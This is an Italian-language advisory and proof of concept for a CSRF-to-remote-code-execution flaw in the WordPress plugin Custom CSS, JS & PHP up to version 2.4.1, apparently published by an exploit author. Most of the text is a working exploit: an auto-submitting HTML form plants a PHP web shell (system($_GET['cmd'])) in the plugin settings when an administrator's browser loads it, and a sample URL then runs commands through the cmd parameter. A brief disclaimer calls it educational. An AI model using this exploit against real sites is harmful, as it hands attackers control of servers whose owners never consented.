
Plugin WordPress Custom CSS, JS & PHP <= 2.4.1 - Vulnerabilità da CSRF a RCE
Una vulnerabilità Cross-Site Request Forgery (CSRF) nel plugin WPFactory Custom CSS, JS & PHP consente Remote Code Execution (RCE) tramite l'iniezione di codice PHP malevolo via richieste POST non autorizzate.
Ciò interessa tutte le versioni fino alla 2.4.1 inclusa.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HDi seguito uno screenshot che mostra il risultato di uno sfruttamento riuscito, dimostrando come il codice remoto può essere eseguito tramite il parametro URL:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded.http://target-site.com/?cmd=whoami
Questa PoC è solo a scopo educativo.
L'autore non è responsabile per qualsiasi uso improprio o danno causato dall'applicazione inappropriata di queste informazioni.
Testare sempre in ambienti controllati e con autorizzazione.
By: Nxploited | Khaled Alenazi